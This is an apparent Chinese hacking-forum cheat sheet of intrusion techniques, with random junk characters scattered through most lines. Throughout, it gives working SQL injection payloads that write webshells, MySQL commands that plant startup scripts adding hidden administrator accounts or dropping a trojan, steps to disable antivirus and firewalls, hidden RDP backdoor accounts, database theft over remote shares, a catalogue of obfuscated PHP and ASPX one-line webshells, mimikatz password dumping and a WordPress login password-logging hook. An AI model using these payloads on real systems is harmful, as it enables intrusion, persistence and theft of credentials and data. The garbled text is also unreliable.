查询sql server 2005中的密码hash# ?, |; V2 @" {5 @7 t# l' h
SELECT password_hash FROM sys.sql_logins where name='sa'
/ T9 {; g& v6 ~! e3 ESELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
$ |3 X- d6 x) {( Laccess中导出shell
9 p# V( n+ i. R  `) R
8 I- V$ E8 J% K! [中文版本操作系统中针对mysql添加用户完整代码:
( A. s7 j* B. j) ]4 H, S8 [. @7 W2 z/ g/ \9 k9 m) x2 G" B3 V
use test;9 b3 B$ N. g6 [4 j( R" M6 \
create table a (cmd text);
0 J$ S; s& U- g% @3 Qinsert into a values ("set wshshell=createobject (""wscript.shell"") " );7 `. ^  v+ f( S
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
0 |" b" y2 E, v' I$ _9 Winsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );3 ]" x1 J& }. T# o" ~( Y7 ?& i
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";0 r6 B( W* r+ _" K9 h
drop table a;4 _/ W: S- a" F1 Y0 G
# s) }+ o; l. C0 N( ?6 k4 a: V7 ?1 M
英文版本:- V/ P! X2 W5 g! Q0 V) B
$ n( M2 Q1 f9 q' V2 c
use test;1 R: L: i  l  C7 Y  l
create table a (cmd text);
. Z7 M0 U2 \8 }# A: E# pinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
9 ^; s- e) F0 g2 B7 g4 @1 Binsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );6 E, k5 [# W. f0 U  O
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
/ A. N7 I3 k6 B  M7 r* ^select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
! t. N- I) U0 Hdrop table a;# y8 y0 V3 }% D) @& g+ G2 k* K
. h2 P5 n. F" @2 \
create table a (cmd BLOB);
1 [' J$ J* }1 {insert into a values (CONVERT(木马的16进制代码,CHAR));
6 Y1 [/ T' z$ Z- {6 Y5 Aselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'7 p' i0 {& U; u: w
drop table a;+ F% }4 b* t; P! ^" N' b$ x7 T

; ~, D# U9 T% g! Z7 l* h9 c, I. D记录一下怎么处理变态诺顿, o. v% _6 V9 [, Q( s
查看诺顿服务的路径2 z6 J& Y5 E( t+ }0 t( Z6 @
sc qc ccSetMgr  [5 u4 ^# o1 _( I* l
然后设置权限拒绝访问。做绝一点。。
5 w4 W" R0 _+ V' a7 a# bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system: Y% ^3 S  i5 t& r0 g+ K- q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"& O! i* c* H% ]3 A* d- L9 {! w
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators4 ^/ v# t! P5 w+ w9 t8 T5 n
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
2 y' W) P; v  k; e9 p
( Z" D4 t5 J) \- `3 }9 @. ^" k然后再重启服务器( k# m6 B, ~: l' y0 N7 h
iisreset /reboot
2 [! Z4 V3 f3 a  `+ \这样就搞定了。。不过完事后。记得恢复权限。。。。
+ V5 v8 m, g) Icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
4 f+ t* ~! ]. M, c/ Ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F! u2 H: ^4 n; w& `) J( ~* \7 h
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F3 r% e' V4 ?, Q" \: ?0 M
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
2 v/ T& n: l2 FSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
7 r# k: K' }+ M' p; ?& D: W
: g) @" w) Q0 T$ r. cEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')  k  {; [. Z. f! I- N/ j8 l' U
! g- ^5 S1 D: j3 f$ `# ]
postgresql注射的一些东西
5 T$ T  \% B; t3 ~如何获得webshell
6 F' P  ?/ W; g3 \" e5 jhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); # [6 _% H1 Q( g. F# s! F( ?
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
$ }; y9 {6 |1 H1 J9 m, Xhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
; [$ H* X+ A/ H如何读文件! ^- [; `. T% U/ b: P
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
6 d: a2 @' ~6 Nhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
; `  X8 T. \7 R; i% vhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;. V: ?' V+ b, V  O. }  i3 s: L) v7 B

9 V) G3 [" p; ?/ Bz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
* I# [: R% _" b# v$ F* R当然,这些的postgresql的数据库版本必须大于8.X5 c* E8 w) i9 G8 ~3 [
创建一个system的函数:
/ j! n! b" i2 [! qCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT. n7 h1 {0 F, L2 {6 l! Z' u

4 h% U8 V  V3 S: F8 h1 c, {创建一个输出表:
9 P( _8 A+ O  M2 e7 qCREATE TABLE stdout(id serial, system_out text)# J% Z" i0 L$ b/ X: C- d! A5 j' h, }5 i

  J  _! D# X" Y. ?& f执行shell,输出到输出表内:
2 w; H/ e( Q/ \: g. V' h" ESELECT system('uname -a > /tmp/test'); q- n; }7 `1 v; O8 y0 h$ F
, i  g: e% u4 |7 T1 @& Q4 i
copy 输出的内容到表里面;
& l9 G3 @# G( s& g7 r5 A7 dCOPY stdout(system_out) FROM '/tmp/test'
5 V! d0 U3 v! U1 V9 M' O
) Q: y3 z$ C! f, z' k8 q2 ~从输出表内读取执行后的回显,判断是否执行成功
' L4 W' y  `) w. X, ~1 t4 C. ~% z! e) }/ I, O( ^- O9 k
SELECT system_out FROM stdout
7 w% \: M- J$ v' ]下面是测试例子
2 {. j( E1 W& U; w# S+ g
: }  }: ~' [/ g( h5 B* T/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
6 g& \& {( k1 v. x% d/ Z- r- E( O1 F; K8 n' U* B( u7 `
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
1 Z0 z3 A2 M9 A) @( ~STRICT --
, o9 r1 J. z: M# u* g6 G) f/ _
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
( f% ^. m+ x: k& v4 e* W. I- L" B' t9 b8 [/ j/ Y  N! O
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --5 F! J7 L- \! T1 j) }- n2 _
6 E( W( r$ N2 {9 v* t
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--7 i5 ?$ l/ Z/ b2 }5 ~
net stop sharedaccess    stop the default firewall4 x* G  i. m0 x( i, S7 |/ Z2 D
netsh firewall show      show/config default firewall& V+ z. @. f+ U9 d3 h3 n
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall( K) R% t4 T$ P, @9 |. f8 j5 g2 u) R+ q
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall3 r8 [' }# ?. B
修改3389端口方法(修改后不易被扫出)  a0 @  q. p- \: _1 D
修改服务器端的端口设置,注册表有2个地方需要修改
4 L7 e9 }( G- w+ Z$ H. v8 L+ f7 i( ^+ C3 E5 j6 ?$ g
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
& u) l) J5 G9 {" F4 rPortNumber值,默认是3389,修改成所希望的端口,比如6000
. R. G3 Z1 f' d* A0 c: X  r& v+ {0 V7 O3 @& B3 m
第二个地方:- K" m7 f2 k; m4 V9 d
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] : l( z7 c( h! s" ?+ o  @* l
PortNumber值,默认是3389,修改成所希望的端口,比如6000$ F& N( u' l- g7 D5 d
/ U7 x0 O: M& K: n0 m
现在这样就可以了。重启系统就可以了
. p+ c* S, n  L6 Z" M* d! ]& |
" Y' b( q- `. P% o/ z, l查看3389远程登录的脚本) s4 L& O6 u/ u* p
保存为一个bat文件! g. E% y  x! X
date /t >>D:\sec\TSlog\ts.log$ Z2 Q: G. R8 T: D) k5 @; f
time /t >>D:\sec\TSlog\ts.log
' T* D0 q% S- l( _* anetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
6 f  \- ~9 j( w. {start Explorer: C! i* ^5 \: ]5 _. T& s* o

4 f5 ^7 J1 n, r! o3 Emstsc的参数:  F/ e( M8 s" i7 _2 n, F9 e
9 `2 v: e+ d! I
远程桌面连接
# y: A! v+ X! ?+ \
- \0 g6 R0 \% O0 J% V" T1 q: ?MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
8 d/ M: o, m3 M. v  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
1 ~; ]$ q9 c8 S" }
- C/ z/ D! j3 W+ O' p7 j! F<Connection File> -- 指定连接的 .rdp 文件的名称。; k) S' H, R. Y
" T0 R" r# n% C8 ^1 I" V; x; G# j  i
/v:<server[:port]> -- 指定要连接到的终端服务器。
# o& i* M* U6 p0 K/ Q' Y6 K( y9 W5 a! ?$ o, ^* q1 D5 P
/console -- 连接到服务器的控制台会话。' O8 y  F1 P6 \$ E% B5 M6 i

+ b2 S/ P* E3 m: j/f -- 以全屏模式启动客户端。
* g, Y! Y, o& G. b; v
) h$ I5 m) x! ]5 a9 l& p/w:<width> --  指定远程桌面屏幕的宽度。
5 |( {# A( d* o) x7 F$ A, t2 ~7 d+ W, ?1 C+ ~1 W
/h:<height> -- 指定远程桌面屏幕的高度。+ ~/ H' f0 J+ S- v3 l# [

1 I; ~6 [, J3 [7 J7 w5 d/edit -- 打开指定的 .rdp 文件来编辑。/ |+ A( p5 U- e1 m/ b3 D
+ R" x0 u9 b5 R' b# s
/migrate -- 将客户端连接管理器创建的旧版7 e5 M1 a. D5 @; u" r9 ?
连接文件迁移到新的 .rdp 连接文件。9 ]; F  D& v, |/ H' b, e$ Z/ m

- k8 ^8 ]# }! ]* l. Z% V4 \: E! G: t' }' H5 o) }( T
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就8 g$ D. n- `7 Y# x6 R- X0 [8 S5 Z1 q
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
; ^! D/ o( G4 i1 s$ y2 C: T, t8 h2 |# k) |$ z* ^) M9 k- J; s
命令行下开启33892 h4 I6 V8 \! k9 ?5 h6 }
net user asp.net aspnet /add3 n2 N8 k6 m( W. c% S3 S0 x
net localgroup Administrators asp.net /add& w  D% ]# }; @! {" F
net localgroup "Remote Desktop Users" asp.net /add7 p( ?- `8 o/ m9 i1 r) a7 L
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D6 W! v6 D) |, g7 J6 x/ |
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
/ |4 U6 w" h  ?1 v; kecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1; o+ c- l" G$ Y( `% q3 E5 W; L
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
; q) j3 V; H# G# X" Vsc config rasman start= auto$ i5 _# ~( d8 T7 v1 J  o+ a+ W
sc config remoteaccess start= auto0 C/ d9 H. f5 j% Z. R" g3 J
net start rasman
9 D; \; W$ X- r- Onet start remoteaccess
% e9 t8 H+ g& r2 |9 p7 tMedia2 u/ ]- Y6 {+ g& U0 Q  r4 d) x! S
<form id="frmUpload" enctype="multipart/form-data"( t/ Z$ [  ?  F2 v& N; C4 G
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
0 j. E* a9 g" ~7 J: H<input type="file" name="NewFile" size="50"><br>( g* V" F, ^( |' y
<input id="btnUpload" type="submit" value="Upload">" ?' Y/ E/ r. g( w/ V
</form>! w, R8 V- r  ~9 I1 G2 `; ~* e

! Q# l7 \' ~& t( D) |control userpasswords2 查看用户的密码
0 \' ^7 L& @* U. g3 ?access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
+ t' B7 \2 Y; x* @% vSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a8 f# F, v/ }6 \" z, B- `0 b

- _% A7 p/ t! A3 Y1 z  \& V141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
0 R4 `8 T4 b, v4 _+ Y* D1 m5 q: ^测试1:
$ G2 z& D" I8 g" H1 j4 ]+ ]SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
% h4 W( e# B2 {$ @' Y0 x# O$ f% Y% _( n# @7 t+ @
测试2:
) ?1 W' G) @) t: s+ _; g! n! u* }% W+ v& ~6 U3 o9 S2 q
create table dirs(paths varchar(100),paths1 varchar(100), id int)
7 t# I4 J3 t) c8 I, K2 W" h3 N- C) p3 F7 ?- R# w# u/ p3 G: G" @
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--8 U! @4 w# l( k
5 M2 B8 T2 l3 J7 |( G  O, q
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t19 C% Z, c& n" u0 S- S1 h
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令& Y  k6 ]3 Z) Q# O8 f
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
6 G5 {7 B5 l$ Y  N7 _net stop mcafeeframework
4 u4 _, @- x2 F, G9 Gnet stop mcshield' |( c4 ?5 y! a  [! G' \
net stop mcafeeengineservice
, d' |5 U% M2 g; h7 q, W* f' onet stop mctaskmanager
1 f' h: Q/ C( }( m9 F% q/ \# Dhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D( J6 O$ W: U: l+ q( N& F) [; G

0 M9 [1 d9 N8 `) g% F5 S" W  VNCDump.zip (4.76 KB, 下载次数: 1)
& ^$ S1 G( q' m" Z2 G密码在线破解http://tools88.com/safe/vnc.php6 I+ [! L: X) D% @% |$ |
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
! {! N! j( _6 W) a7 o9 A% W0 C. P: K% ^! r1 w9 U/ ?
exec master..xp_cmdshell 'net user'
' H8 I$ E% v  x8 ]# Amssql执行命令。6 p; H5 n' h# ~( y( z. p5 s3 u
获取mssql的密码hash查询
' f. S( g# T5 C8 i7 z% O9 h. xselect name,password from master.dbo.sysxlogins
; L, ?6 Y* B! ^
% ?* R/ C" A( C* [: ~backup log dbName with NO_LOG;! P  }2 T; `+ K8 a7 M" Y
backup log dbName with TRUNCATE_ONLY;
! h# ]3 P  Z" W+ B7 s5 PDBCC SHRINKDATABASE(dbName);# F" C  j# ~) w0 Q7 v
mssql数据库压缩
; `0 e6 _2 `3 G  G6 i* {3 _( I: r! K4 I; j9 g+ U
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK( Y% A) y* E6 r& ]
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。* f7 C6 {. [+ H, n9 E
4 r0 }6 W7 h$ B8 `* c
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
+ D) J7 c5 K$ w8 _, s1 Q备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
. l9 M2 _$ ~/ B: u; _7 y" G- m! ~6 P8 m* F, i9 m
Discuz!nt35渗透要点:
& X% \( n5 h( H" p(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
+ G* l1 R. J' I: A+ q0 o9 O7 Y(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>4 w4 I/ E4 e! y& T- O+ D
(3)保存。
2 k1 x3 a- L3 Z(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
4 f! A4 f) ^4 Z, ^" s+ Ld:\rar.exe a -r d:\1.rar d:\website\& P+ u4 N4 p$ U) v) c
递归压缩website
( [5 h. K& E7 Y* A$ C1 ~, o1 e) J注意rar.exe的路径6 a$ D4 R& b( |* R9 ?1 }

' Q+ F3 n' d+ C" q+ G<?php
; r! d# D3 |' ?$ ]
/ K3 L+ \5 t% D5 X9 P) f$telok   = "0${@eval($_POST[xxoo])}";
/ n/ X3 ^7 O6 K8 ^) U" Z+ \( d6 R# h8 P4 V' ~. ]% L! G  w% m
$username   = "123456";
  V/ e4 o% l" j" `7 v8 x2 a6 u0 U* k, f5 h
$userpwd   = "123456";
. p( g8 g( i0 n6 M- k- N# \0 N. A. ~. S1 [& `
$telhao   = "123456";6 j* M' M- A9 W# l& ^( u
9 [6 ]0 N8 n1 R) r1 L( N. A/ m
$telinfo   = "123456";/ R+ w8 |& Z8 D
/ H: r" f! e) _' X6 a
?>3 v! a% v( C6 D: ~
php一句话未过滤插入一句话木马
* @6 f  G2 a$ H4 G+ ?, @  \8 S0 q, _, c. ^
站库分离脱裤技巧1 n0 V# i# n8 L# q/ ^
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
/ M- l. C4 G: o3 b4 r9 lexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
6 I1 O1 z% q' L4 N/ f9 B  Y条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。$ O7 S$ F( Q/ m6 E, M* J1 H6 F6 y
这儿利用的是马儿的专家模式(自己写代码)。
" o  \8 |2 A3 R; Hini_set('display_errors', 1);4 }5 K8 W8 u: C. `( \6 n6 a$ n8 G
set_time_limit(0);: E+ k& B( |6 [+ f" X/ s
error_reporting(E_ALL);
, u2 {) d) o* p* g4 K8 D: Y$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
: h; X& j5 K# z' Z* Bmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
! O1 j- d: F6 y: K9 J: }8 k* M$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
# N6 x/ T4 h/ \4 _' m. ^* S9 w) _9 S- W$i = 0;. n3 p  J) c& g2 k7 W
$tmp = '';7 m- A& C+ w/ e* G& q1 p
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
3 X/ Q2 e# q+ C# H    $i = $i+1;# h5 V6 G$ Z5 L
    $tmp .=  implode("::", $row)."\n";2 a7 Z$ p/ E9 |: ^# R
    if(!($i%500)){//500条写入一个文件  x6 _/ r. y( _# V! Y" n. K4 @1 _
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
2 s) q' Z. d) {        file_put_contents($filename,$tmp);
$ m2 v: Q3 N2 ?% C) d( X6 g7 d        $tmp = '';
2 P. ?* {% j/ R) U    }
; y5 G/ A! i& q; F" F) f% Q}, W# i+ x3 k; z# _4 G
mysql_free_result($result);
( D4 z; M8 c) ~& e
" N  P( v( t' h0 a( @) `; x* E' `, T6 v/ G; I# S
/ ]: c' C" `' R: P( E* M* A$ h( n
//down完后delete# u0 t6 u2 C' C/ U' ]
0 y  s: g1 F7 V4 z$ Z5 @

- R% B/ B, C( v; q: Fini_set('display_errors', 1);$ y( x% c! S5 f
error_reporting(E_ALL);
" k6 o& u$ |2 V: |! p$i = 0;2 n- G8 P; D; J8 m! |4 }
while($i<32) {
% z1 a3 y1 V1 g# q& Y: m, _2 S; K    $i = $i+1;
. Q  [! J8 S, Z6 a8 R        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
# A# F  b" R2 O: M; d        unlink($filename);7 q, H8 g3 M' y& y' g* J. h
}
: Q  _9 U* _4 h5 z4 u4 c* ]httprint 收集操作系统指纹
% |! z! p9 u% p0 Q, E扫描192.168.1.100的所有端口& Z4 a8 S- ^" Z2 E9 C) R0 r
nmap –PN –sT –sV –p0-65535 192.168.1.100" V7 h  \( m0 m- l( p& d1 A
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
; k- x1 M4 ~) C: g" p# S: nhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输) F% [5 u0 ]% ?# r4 l% i) b+ Y
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
. g( @7 c: B( Q+ X2 E
9 I# ^5 U4 w- k7 i' \! }Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)* E: v6 F& _2 I, m* X

1 N. ]+ ^( Q; z6 _$ }; ?! K4 m( `  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)  l2 _" l% z* s) _

" J. j" k7 t8 G5 Q$ f) C  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x5 q! F) g" g, m9 b$ t0 D; d
/ w( Y; |9 M/ E) C9 L3 [
  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)5 i( j8 S/ M9 J( b- h2 X1 _
: t( k2 P6 p" t, A
  http://net-square.com/msnpawn/index.shtml (要求安装), E- T+ \; |- A5 D4 F3 Q
5 g% w0 _; s5 k+ I; e/ J6 S1 h. l- [' @
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的): I+ q8 I8 C/ [5 H

5 b! R* @" L$ q, w  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)5 w! z  D  W; v+ P' Q, o6 X
set names gb2312
* U9 @$ A8 G3 e导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
9 l6 D, M& U% z1 d/ [. R! k3 H% D! d2 w6 }$ N) g% e/ `
mysql 密码修改* t; o- R, B" a" l- _  T( j( z
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” / C* n4 Z; {1 J9 R  j3 x# Q( [
update user set password=PASSWORD('antian365.com') where user='root';
- l4 g2 R7 ~! N8 F2 \* _, f; Zflush privileges;# j' z! K8 |7 h* P+ ~; L7 a+ h3 l
高级的PHP一句话木马后门
7 f& |6 [( C) \
" e" ?# w+ R, P. @" k入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀6 A4 D9 b# I* T- l$ }+ r/ z

: F, N) L. m$ g' r1、) j( N9 O( A; v( b5 B- \1 ~
9 i8 i" H- Z7 S( K8 B
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";0 W" K% O/ d" @

$ w1 V* h5 e5 K8 I( G* F  g1 s$hh("/[discuz]/e",$_POST['h'],"Access");4 ]& u, W# b; p& H1 N. ]
9 q# g: n' R8 a( X8 h5 T
//菜刀一句话8 X. a0 A! v$ H' h4 D
" _" O) {9 S+ o) x4 n
2、- R+ a3 a: v" \% Y4 K2 Z
& f" I3 `; i! x" E6 k. t
$filename=$_GET['xbid'];1 o# ]8 b. B/ P
6 A# O% ^( G9 _
include ($filename);
5 R" x- [; r' v. I7 |! A. w2 n; N$ a, c4 F
//危险的include函数,直接编译任何文件为php格式运行
0 x+ t( S+ Z( ^  W' H( z: [4 ~0 I; m& @/ ?. R2 X. m3 \8 E2 {
3、) n0 G1 f  Z2 C) u+ [
$ O& o# K& U$ k: T6 a
$reg="c"."o"."p"."y";' y0 R- f. W1 O% S
& r) f+ Z3 \- h! l
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);6 z! v. F) x1 N8 [$ @' [) ]$ u

* ?9 x9 g# ^# \! m" i( q//重命名任何文件3 r; ^% n# f0 r* j8 C: z; i

6 J3 J" \+ H. T; y1 U4、; E3 p1 ~, o! ]% N/ N# }

; w0 X" }' j$ d& S$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";/ c1 y1 ~2 j! i4 w5 ?' c# C
1 E  V! E0 ]. w- f% ]* b* R
$gzid("/[discuz]/e",$_POST['h'],"Access");
7 L: u: N5 k0 T  m5 |1 ~1 P/ ]: f3 ?3 S
//菜刀一句话. @+ i* N' |% x' |' H( B( D
. E* `! c: i! I8 G
5、include ($uid);
/ u1 @4 @* g0 R! ~, u4 h
3 ]3 \9 D. {* E' x7 P6 P//危险的include函数,直接编译任何文件为php格式运行,POST ( _/ D- E4 u9 K
, K7 i; e$ O: j0 r  ]4 `( Q, [9 C
' x+ [- P* A/ X/ A) P0 x! v
//gif插一句话4 k% w- h1 P1 j: P5 L$ n
1 E! n( G) j. t, T, p; L5 ]
6、典型一句话
3 ^; ~) e. U+ Z6 L% M& t1 V. f' }% [2 _+ p0 d
程序后门代码) j5 n5 I  N3 p" d0 _
<?php eval_r($_POST[sb])?>4 B$ B" P/ h3 w+ m$ V
程序代码& J  B1 `5 {2 G/ [' r, k
<?php @eval_r($_POST[sb])?>
( D& }5 L# `4 F  ^, ~. W" Z//容错代码; ?1 B% c2 a$ v' {( _
程序代码
0 v% u$ h/ Q, L<?php assert($_POST[sb]);?>0 v$ s  E7 g6 b
//使用lanker一句话客户端的专家模式执行相关的php语句
, a" g4 G# B! a  b* D6 ^程序代码
5 X9 H. T) \5 Q" m, i1 l<?$_POST['sa']($_POST['sb']);?>% l, [, E* _" I- Z( {1 e2 p5 L, B( A, h. J
程序代码; c" Z8 k' t8 q) m) ?% R
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>( s- m- M3 K2 P8 b7 l# C
程序代码( j6 B  p8 ^& B
<?php+ s7 `% @! U! V; \  C8 j' e
@preg_replace("/[email]/e",$_POST['h'],"error");
) q8 t% T5 v" t0 q3 ??>
: |7 u0 v# V; H//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
; s, ]3 ?" k4 d& e1 v. F* \3 p2 F程序代码
. D" n3 a, g* |- Z, d/ G' ^; O<O>h=@eval_r($_POST[c]);</O>
- k- Z  R* y) N程序代码# A1 L! r( Z8 \0 A- a8 w- y9 `
<script language="php">@eval_r($_POST[sb])</script>
1 Z  ?( w- J( W0 p8 ?1 q3 x3 o//绕过<?限制的一句话. {4 I7 [- x- `% }

5 N* i& v0 S) }4 v, M3 F; Yhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
5 y! i+ N' |6 \; U9 e: ^" l, [0 b详细用法:  c  J6 O9 g) G; C
1、到tools目录。psexec \\127.0.0.1 cmd
5 o4 I4 j  e& ]! C9 \2、执行mimikatz
# X4 y  P0 O: r3 T; M3 N3、执行 privilege::debug4 d5 T1 Q% Y% [- C8 c6 x
4、执行 inject::process lsass.exe sekurlsa.dll0 @9 r4 L+ z8 u) ]
5、执行@getLogonPasswords
2 f% N' M4 R0 i6 G& ~$ z  t6、widget就是密码: B/ _/ {$ |1 k2 C/ T3 S
7、exit退出,不要直接关闭否则系统会崩溃。
; V' W  A9 t$ @* d& O) A% v
7 L) E+ [; s; |; K4 P0 xhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
2 ]3 W% T6 h2 J' i7 N+ y
/ K! j, R1 A. i  i) F) r自动查找系统高危补丁4 w: j6 O: A8 d( P7 u
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt: j" Q! U# t9 |: B: x

; i, }$ O  ?, l, C" p& \突破安全狗的一句话aspx后门, w# U' R5 d' i
<%@ Page Language="C#" ValidateRequest="false" %>5 e# o( o, V. y8 M5 Z8 [! u
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
/ J0 Y+ C, w( G' x' Bwebshell下记录WordPress登陆密码8 N+ J7 V5 G3 B. N/ P
webshell下记录Wordpress登陆密码方便进一步社工4 ^% K8 g5 y5 h2 x
在文件wp-login.php中539行处添加:
  O' ]$ L' o. G0 w  k# ~4 p// log password4 `/ e1 r+ J' P9 R
$log_user=$_POST['log'];
( f5 m: k  @- ^2 H# Q$log_pwd=$_POST['pwd'];
